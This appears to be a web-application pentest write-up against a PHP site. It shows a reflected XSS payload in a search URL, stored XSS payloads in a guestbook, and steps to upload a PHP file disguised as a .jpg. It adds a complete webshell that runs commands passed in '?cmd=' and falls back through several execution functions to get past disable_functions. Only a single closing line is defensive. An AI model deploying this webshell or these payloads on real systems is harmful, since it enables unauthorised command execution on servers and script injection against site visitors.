Right off the bat, try hitting the search box with a simple XSS payload:
search.php?query=<script>alert(1)<%2Fscript>&x=24&y=12
#/guestbook.php
Placing this:
<script>confirm(1)</script>
<img src=x onerror='confirm(2)' />
into a guestbook comment body gives stored XSS: the payload runs for every visitor who loads the page.
Next I made an account and started uploading files. It turns out PHP files are both uploadable and executable:
- Name the file: whatever.php
- Give it the extension: .jpg
- Upload it
- On the page you're redirected to, open the broken image's URL in a new tab and remove the 550 from the URL
- Append ?cmd=ls -latr to that URL
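The writeup never shows what the uploaded PHP file contains. As an added example (not the file from the original notes), here is a minimal webshell that matches the `?cmd=` parameter used in the last step. It assumes the target executes the file as PHP despite the .jpg extension, as reported above; the fallback through several execution functions is my own addition for hosts where `disable_functions` blocks the obvious one.

```php
<?php
// Added example, not the file from the original writeup: a minimal webshell
// that matches the "?cmd=" parameter used in the final step. It assumes the
// target executes this file as PHP even though it was uploaded with a .jpg
// extension, as the notes above report.

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : '';
if ($cmd === '') {
    exit('no cmd');
}

// PHP deployments often blacklist some execution functions via
// disable_functions; pick the first one that is still available.
// (On PHP 8 disabled functions also fail function_exists(), so both
// checks are kept for older and newer interpreters.)
$disabled = array_map('trim', explode(',', (string) ini_get('disable_functions')));
$output = null;

if (function_exists('shell_exec') && !in_array('shell_exec', $disabled, true)) {
    $output = shell_exec($cmd . ' 2>&1');
} elseif (function_exists('exec') && !in_array('exec', $disabled, true)) {
    exec($cmd . ' 2>&1', $lines);
    $output = implode("\n", $lines);
} elseif (function_exists('proc_open') && !in_array('proc_open', $disabled, true)) {
    $spec = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open($cmd, $spec, $pipes);
    if (is_resource($proc)) {
        $output = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]);
        fclose($pipes[1]);
        fclose($pipes[2]);
        proc_close($proc);
    }
}

if ($output === null) {
    exit('no usable exec function');
}

// Escape so the command output renders literally in the browser.
echo '<pre>' . htmlspecialchars($output, ENT_QUOTES, 'UTF-8') . '</pre>';
```

When calling it, URL-encode the command (`?cmd=ls%20-latr`; `&`, `;` and `#` must be encoded too or the query string is cut short). The defender-side lesson from this step is that an extension check alone did nothing here: uploads need to be stored outside the web root, or served from a location with no PHP handler, for the check to matter.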